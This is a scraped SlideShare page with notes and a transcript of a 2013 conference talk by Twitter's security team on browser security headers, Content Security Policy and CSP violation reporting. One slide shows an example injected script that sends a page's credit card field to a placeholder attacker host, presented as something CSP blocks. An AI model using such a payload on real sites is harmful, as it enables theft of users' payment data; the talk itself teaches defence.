Your SlideShare is downloading. ×
0
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Owasp austin
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Owasp austin

648

Published on

0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
648
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
4
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide
  • My name is Alex Smolen, this is Neil Matatall and this is Justin Collins. We're on Twitter's Product Security team and today we're going to talk to you about security automation at Twitter.
  • Content security policy defines what can "run" on a page and any deviation creates an alert. And Twitter was an early adopter. We saw that this could not only potentially protect our users, but give a large number of data points as to what the user is experiencing. We have used CSP to help detect XSS and mixed-content by leveraging the reports sent to us by the users' browsers. This compliments the static and dynamic analysis provided by brakeman and phantom-gang in a unique way as we are receiving information from the user. We send the CSP reports to a central scribe host (describe: massively scalable endpoint to collect and aggregate large amounts of data) which writes to hadoop file system which we can run "big data" reports against using pig/scalding. We send this information to SADB where we can search and sort more easily.
  • With the help of whitehats, we tracked down and fixed a lot of these bugs.
  • For example, we can use static analysis to check for common coding problems, dynamic analysis for obvious problems on websites, and maybe CSP to get XSS reports to us sooner
  • The first is that we believe writing secure code is not just a technical challenge, but also a social one, and tools should be built based on supporting and enhancing existing social processes. Unless it's one person writing, analyzing, and shipping code, then communicating about vulnerabilities is just as a important as finding them. And effective communication is really hard. We're not talking about emailing a huge report of maybe bugs to a project manager. We're talking about delivering all of the necessary information to diagnose and fix a vulnerability in a simple and user-centered view.
  • The next principle is about finding and fixing things as quickly as possible. It's not a new idea, but as a guiding principle it leads you to be ruthless about bottlenecks, latencies, and root causes.
  • There's a lot of ways to find security problems, and you get diminishing returns from each. We have tools that live on our servers, tools that live outside our server, tools that live in our users browsers, all meant to catch different types of issues.
  • Most people want to do the right thing. We want to make it easy for them.
  • Take a survey
  • Many of these headers not encourage best practices while providing a better user experience and saving resources
  • save resources since nothing is framed
  • Twitter has had clickjacking problems in the past. While xfo does not solve all clickjacking issues, it does solve a very common case and is generally a very quick win that is easy to integrate.
  • hsts preload and max-age
  • Explain how redirecting to https doesn’t protect the initial request Save round trip
  • Explain mixed content: MITM assets Firesheep Cookies sent Supported in webkit (phantomjs) accept arbitrary and safe because inserted scripts won’t execute on* events javascript uris restrict using eval
  • script tag on* events javascript: hrefs Even mention inline style As a policy, no inline script should be added, moratorium on inline script well received
  • A report from one of our wonderful whitehat reporters gave us a drop of happiness when he said that a successful xss attempt had been thwarted by CSP. TRANSITION: we took stock of what headers were implemented on our properties, and we were not satisfied. They were applied inconsistently and a by a variety of one-off methods.
  • Mention github blog post There are a few, mostly well known, ways to solve this - data attributes, blocks of code parsed as json mention the application of the header
  • strings or hashes
  • Caching and hosted content concerns
  • Talk about custom elements, being able to attach one way behavior like framing in a sandbox solving the clickjackable follow button html dom aware templating resource integrity
  • Yeah, some browsers protect you, but not all support it
  • Given that the browsers give us some baked in security and they take a relatively small amount of effort to implement, why aren't they more common? It’s a non-intrusive, easily configured way of enxuring that all requests get the necessary headers applied. We created a gem for Rails applications, and we intend to apply the same logic to our other frameworks as well.
  • Content security policy defines what can "run" on a page and any deviation creates an alert. And Twitter was an early adopter. We saw that this could not only potentially protect our users, but give a large number of data points as to what the user is experiencing. We have used CSP to help detect XSS and mixed-content by leveraging the reports sent to us by the users' browsers. This compliments the static and dynamic analysis provided by brakeman and phantom-gang in a unique way as we are receiving information from the user. We send the CSP reports to a central scribe host (describe: massively scalable endpoint to collect and aggregate large amounts of data) which writes to hadoop file system which we can run "big data" reports against using pig/scalding. We send this information to SADB where we can search and sort more easily.
  • Transcript

    • 1. @ LASCONATXApril 30, 2013CSP To theRescue
    • 2. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityIt’s all about meI’ve been called a jackassI’ve been called an “appsechole”I have opinionsOpinions are often wrongPlease disagree with meThat’s how we learn
    • 3. CSPBrakemanThreatDeckPhantom GangRoshamboEmaildevelopersEmailsecurity
    • 4. Code reviewExternal reportsPen testingStatic analysis toolsDynamic analysis toolsCSP
    • 5. Get the right information to theright people
    • 6. Find bugs as quickly as possible
    • 7. Analyze from many angles
    • 8. Help people help themselves
    • 9. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityDo you use these?Content security policyX-Frame-OptionsHTTP Strict Transport SecurityX-Xss-ProtectionX-Content-Type-Options
    • 10. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityI’m already boredTime to get awesomer
    • 11. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecuritySecurity headersLeverage the browser for security
    • 12. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecuritySweeeeet. I don’t have write secure code!
    • 13. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityTime of convergence
    • 14. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityShould you?
    • 15. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityX-ContentType-OptionsFixes mime sniffing attacksOnly applies to IE, because only IE would do somethinglike thisX-Content-Type-Options = ‘nosniff’zzzzZZZZZZzzzzz
    • 16. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityX-Xss-ProtectionUse the browser’s built in XSS AuditorX-Xss-Protection: [0-1](; mode=block)?X-Xss-Protection: 1; mode=blockzzzzZZZ... huh? zzzzzzzz
    • 17. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityX-Frame-OptionsProtects you from most classes ofClickjackingX-Frame-Options: DENYX-Frame-Options: SAMEORIGINX-Frame-Options: ALLOW FROM example.comzzz... oh hey thats cool. Don’t frame my stuff.
    • 18. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityX-Frame-Options
    • 19. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityFiresheep/SSL StripGiven I don’t have an HSTS headerAnd I have a sessionWhen I visit http://example.comThen I am pwned
    • 20. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityOther ssl failsPosting passwords over HTTPLoading mixed contentUsing protocol relative URLS
    • 21. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityStrict Transport Security
    • 22. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityHow hard is it to use?Base CaseStrict-transport-security: max-age=10000000Do all of your subdomains support SSL?Strict-transport-security: max-age=10000000; includeSubdomains
    • 23. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityContent secur-a-wat?Content security policy is reshaping the security modelIt is a complicated spec with great differences across browsersIt is not widely adoptedHowever!It completely eliminates reflected and stored XSSIt ensures that you never load mixed contentIt allows you to accept arbitrary html code from users
    • 24. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityWat? Sounds cool.script-srcstyle-srcimg-srcdefault-srcframe-srcconnect-srcfont-srcmedia-srcobject-srcreport-uri
    • 25. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityQuickTime™ and aH.264 decompressorare needed to see this picture.
    • 26. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityGet rid of XSS, eh?A script-src directive that doesn’t contain ‘unsafe-inline’ almosteliminates most forms of cross site scripting.I WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPT
    • 27. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurity
    • 28. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityBut I have to...OK, then I’ll inject:<script>var image = new Image();image.src = “cyberhacker.com/steal?data=”+ $(‘#credit_card’).val();</script>FALSE! img-src violation, no XHR allowed
    • 29. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityInline css too? WTF?
    • 30. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityHow to apply?Secure headers! (poor name, I know)Open sourced earlier this yearhttps://github.com/twitter/secureheaders
    • 31. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityHow does it work?It sets a before_filter that applies each headerValues are based on options passed to filter, or in an initializerEasily overriddenSecure by default!!!
    • 32. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityWhat about that security policy thingyThere are > 6 differences between these two header values
    • 33. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityYay for standardshttps://t.co/f26WWx3r7y
    • 34. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurity
    • 35. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityLong hair don’t careAbout browser inconsistencies
    • 36. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityW3Get involved!!!Key results from F2F in San Jose
    • 37. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityLine numbers and column numbersPreviously, a report that was caused by inline scripts/styles was crypticOriginal FF implementation contained a script-sampleEvals/inserting script into DOM would be buried in minified JS
    • 38. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurity“sudo for javascript”Bookmarklets/plugins/etcHow should they behave?Bookmarklets show clear intentionPlugins somewhat questionableNeed to live outside the control of the parent pageBut how?
    • 39. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityReporting cross-originOriginal implementation did not allow CSP reports to be sent to a URIthat does not match the same origin policy, using the eTLDe.g. https://ads.twitter.com can send reports to https://twitter.com,but not http://twitter.com or https://support.twitter.com or https://twitter.com:3000As a result of the w3 face to face, the 1.0 spec shall say that reports canbe sent anywhere!However, cross-origin requests not allowed by CORS will be “unauthenticated”
    • 40. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityscript-(nonce|hash)The clash of the titans
    • 41. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityFuture
    • 42. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityYou mean there’s more on CSP?The browser sends reports!
    • 43. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityWhat does the report look like?{"csp-report"=> {"document-uri"=>"http://localhost:3000/home","referrer"=>"","blocked-uri"=>"ws://localhost:35729/livereload","violated-directive"=>"xhr-src ws://localhost.twitter.com:*"}}
    • 44. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityQuiz: what does this report indicate?{"csp-report"=> {"document-uri"=>"http://example.com/welcome","referrer"=>"","blocked-uri"=>"self","violated-directive"=>"inline script base restriction","source-file"=>"http://example.com/welcome","script-sample"=>"alert(1)","line-number"=>81,"column-number"=>1463,}}
    • 45. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityMonitor and Tune ALL the things
    • 46. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecuritySplunk
    • 47. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityTrending and anomalies
    • 48. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurity
    • 49. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityHeader status page
    • 50. CSPBrakemanThreatDeckPhantom GangRoshamboEmaildevelopersEmailsecurity

    ×